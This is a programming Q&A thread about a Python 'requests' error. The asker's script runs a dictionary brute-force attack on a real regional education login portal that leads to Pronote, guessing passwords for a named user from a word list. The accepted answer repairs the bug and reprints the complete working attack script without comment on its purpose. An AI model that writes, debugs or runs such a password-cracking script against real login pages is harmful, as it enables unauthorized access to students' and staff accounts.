# Failed to parse: <Response [200]>

Tags: python, python-3.x, http, python-requests, runtime-error

Please help me i don't know how to use requests

This is the code :

```
import requests

url = requests.get("https://idp-fim-aaa.ac-bordeaux.fr/login/ct_logon_mixte.jsp?CT_ORIG_URL=%2Fsso%2FSSO%3FSPEntityID%3Dhttps%3A%2F%2Fent2d.ac-bordeaux.fr%2Fshibboleth%26TARGET%3Dhttps%3A%252F%252F0333287U.index-education.net%252Fpronote%252Feleve.html%26RelayState%3Dhttps%3A%252F%252F0333287U.index-education.net%252Fpronote%252Feleve.html")
arq = open('word.txt','r').readlines()

for line in arq:
    password = line.strip()
    http = requests.post(url, data={'user':'bisch', 'password':password, 'button':'submit'})
    content = http.content
    if "Identifiant ou mot de passe incorrect" in content:
        print("[-]Invalide : "+password)
    else:
        print("================== [+] MOT DE PASSE CRACKÉ : "+password+"===========")
        break
```

and i got this :

> Traceback (most recent call last):   File "F:\Program Files
> (x86)\py\lib\site-packages\requests\models.py", line 382, in
> prepare_url
> scheme, auth, host, port, path, query, fragment = parse_url(url)   File "F:\Program Files
> (x86)\py\lib\site-packages\urllib3\util\url.py", line 394, in
> parse_url
> return six.raise_from(LocationParseError(source_url), None)   File "", line 3, in raise_from
> urllib3.exceptions.LocationParseError: Failed to parse: <Response
> [200]>
>
> During handling of the above exception, another exception occurred:
>
> Traceback (most recent call last):   File "F:/Program Files
> (x86)/py/Hack pronote/Pronote v3/Pronote.py", line 8, in 
> http = requests.post(url, data={'user':'bisch', 'password':password, 'button':'submit'})   File "F:\Program Files
> (x86)\py\lib\site-packages\requests\api.py", line 119, in post
> return request('post', url, data=data, json=json, **kwargs)   File "F:\Program Files (x86)\py\lib\site-packages\requests\api.py", line
> 61, in request
> return session.request(method=method, url=url, **kwargs)   File "F:\Program Files (x86)\py\lib\site-packages\requests\sessions.py",
> line 528, in request
> prep = self.prepare_request(req)   File "F:\Program Files (x86)\py\lib\site-packages\requests\sessions.py", line 456, in
> prepare_request
> p.prepare(   File "F:\Program Files (x86)\py\lib\site-packages\requests\models.py", line 316, in prepare
> self.prepare_url(url, params)   File "F:\Program Files (x86)\py\lib\site-packages\requests\models.py", line 384, in
> prepare_url
> raise InvalidURL(*e.args) requests.exceptions.InvalidURL: Failed to parse: <Response [200]>

Comment: You're setting `url` to the return value of `requests.get`, which is not a url. It's a `requests.Response` object. I'm not even clear why you're calling `requests.get` at that point...did you mean to simply set `url` to the string value of the url there? Are you trying to extract a url from the response?

Answer (score 0, accepted):

As said by @Iarsks, this is a problem where you're trying to use the URL variable, but the URL variable is not a string but an object, request object to be specific.

If I understood your code, I and as @Iarsks said, you probably don't understand how requests work cuz, it seems like your trying to declare an URL somehow when it's not needed. To simplify, you only need the URL string like this:

```
url = "https://idp-fim-aaa.ac-bordeaux.fr/login/ct_logon_mixte.jsp?CT_ORIG_URL=%2Fsso%2FSSO%3FSPEntityID%3Dhttps%3A%2F%2Fent2d.ac-bordeaux.fr%2Fshibboleth%26TARGET%3Dhttps%3A%252F%252F0333287U.index-education.net%252Fpronote%252Feleve.html%26RelayState%3Dhttps%3A%252F%252F0333287U.index-education.net%252Fpronote%252Feleve.html"
```

with out the `requests.get()` function.

So you can understand this library better there are two mainly used requests methods `GET` and `POST`, there are more, but for the sake of this ill only talk about these two, where `GET` is when you want to get information from the website, for example, a JSON file from and API, and `POST` when your want to save or send some new data to and API or webpage.

Anyways I would recommend your reading about the basics of requests and how the backend handles them to understand and see how it all works before starting to use requests on your own.

If I got your problem right, the following code should fix your problem:

```
import requests

url = "https://idp-fim-aaa.ac-bordeaux.fr/login/ct_logon_mixte.jsp?CT_ORIG_URL=%2Fsso%2FSSO%3FSPEntityID%3Dhttps%3A%2F%2Fent2d.ac-bordeaux.fr%2Fshibboleth%26TARGET%3Dhttps%3A%252F%252F0333287U.index-education.net%252Fpronote%252Feleve.html%26RelayState%3Dhttps%3A%252F%252F0333287U.index-education.net%252Fpronote%252Feleve.html"
arq = open('word.txt','r').readlines()

for line in arq:
    password = line.strip()
    http = requests.post(url, data={'user':'bisch', 'password':password, 'button':'submit'})
    content = http.content
    if "Identifiant ou mot de passe incorrect" in content:
        print("[-]Invalide : "+password)
    else:
        print("================== [+] MOT DE PASSE CRACKÉ : "+password+"===========")
        break
```